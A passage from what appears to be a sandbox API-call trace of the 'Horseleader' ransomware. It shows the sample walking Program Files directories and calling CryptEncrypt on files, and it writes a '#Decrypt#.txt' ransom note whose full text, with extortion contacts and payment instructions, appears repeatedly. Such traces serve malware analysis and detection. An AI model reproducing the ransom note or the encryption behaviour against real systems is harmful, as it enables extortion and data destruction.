fm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.903] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0250.903] CloseHandle (hObject=0x21c) returned 1 [0250.903] GetProcessHeap () returned 0x780000 [0250.903] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0250.903] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 0 [0250.903] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0250.903] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\#Decrypt#.txt") returned 64 [0250.904] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0250.904] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.905] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0250.906] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.906] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0250.907] CloseHandle (hObject=0x1cc) returned 1 [0250.907] GetProcessHeap () returned 0x780000 [0250.907] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0250.907] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="Services", cAlternateFileName="")) returned 1 [0250.907] lstrcmpiW (lpString1="Services", lpString2="Windows") returned -1 [0250.907] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Services") returned 42 [0250.907] lstrcmpW (lpString1="Services", lpString2=".") returned 1 [0250.907] lstrcmpW (lpString1="Services", lpString2="..") returned 1 [0250.907] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Services", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.908] GetProcessHeap () returned 0x780000 [0250.908] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0250.908] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Services\\*") returned 44 [0250.908] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0250.909] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.909] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Services\\.") returned 44 [0250.909] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.909] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0250.909] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.909] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Services\\..") returned 45 [0250.909] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.909] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.909] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafbfd139, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0xafbfd139, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0xafbfd139, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="verisign.bmp", cAlternateFileName="")) returned 1 [0250.909] lstrcmpiW (lpString1="verisign.bmp", lpString2="Windows") returned -1 [0250.909] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 55 [0250.910] StrStrIW (lpFirst="verisign.bmp", lpSrch=".horseleader") returned 0x0 [0250.910] lstrcmpW (lpString1="verisign.bmp", lpString2="#Decrypt#.txt") returned 1 [0250.910] lstrcmpW (lpString1="verisign.bmp", lpString2="_uninstalling_.png") returned 1 [0250.910] lstrlenW (lpString=".testttjffg") returned 11 [0250.910] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp", lpSrch=".testttjffg") returned 0x0 [0250.910] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0250.910] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0250.910] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.911] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafbfd139, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0xafbfd139, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0xafbfd139, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="verisign.bmp", cAlternateFileName="")) returned 0 [0250.911] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0250.911] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Services\\#Decrypt#.txt") returned 56 [0250.911] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\services\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0250.912] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.912] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0250.913] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.913] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0250.914] CloseHandle (hObject=0x1cc) returned 1 [0250.914] GetProcessHeap () returned 0x780000 [0250.914] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0250.914] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="SpeechEngines", cAlternateFileName="SPEECH~1")) returned 1 [0250.914] lstrcmpiW (lpString1="SpeechEngines", lpString2="Windows") returned -1 [0250.914] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines") returned 47 [0250.915] lstrcmpW (lpString1="SpeechEngines", lpString2=".") returned 1 [0250.915] lstrcmpW (lpString1="SpeechEngines", lpString2="..") returned 1 [0250.915] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.915] GetProcessHeap () returned 0x780000 [0250.915] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0250.915] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\*") returned 49 [0250.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0250.916] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.916] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\.") returned 49 [0250.916] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.916] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0250.916] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.916] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\..") returned 50 [0250.916] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.916] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.916] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0250.917] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0250.917] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft") returned 57 [0250.917] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0250.917] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0250.917] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.917] GetProcessHeap () returned 0x780000 [0250.917] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79b628 [0250.917] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*") returned 59 [0250.917] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0250.918] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.918] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\.") returned 59 [0250.919] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.919] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0250.919] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.919] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\..") returned 60 [0250.919] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.919] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.919] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="TTS20", cAlternateFileName="")) returned 1 [0250.919] lstrcmpiW (lpString1="TTS20", lpString2="Windows") returned -1 [0250.919] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned 63 [0250.919] lstrcmpW (lpString1="TTS20", lpString2=".") returned 1 [0250.919] lstrcmpW (lpString1="TTS20", lpString2="..") returned 1 [0250.919] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.920] GetProcessHeap () returned 0x780000 [0250.920] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.920] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*") returned 65 [0250.920] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0250.920] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.920] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\.") returned 65 [0250.920] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.921] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, 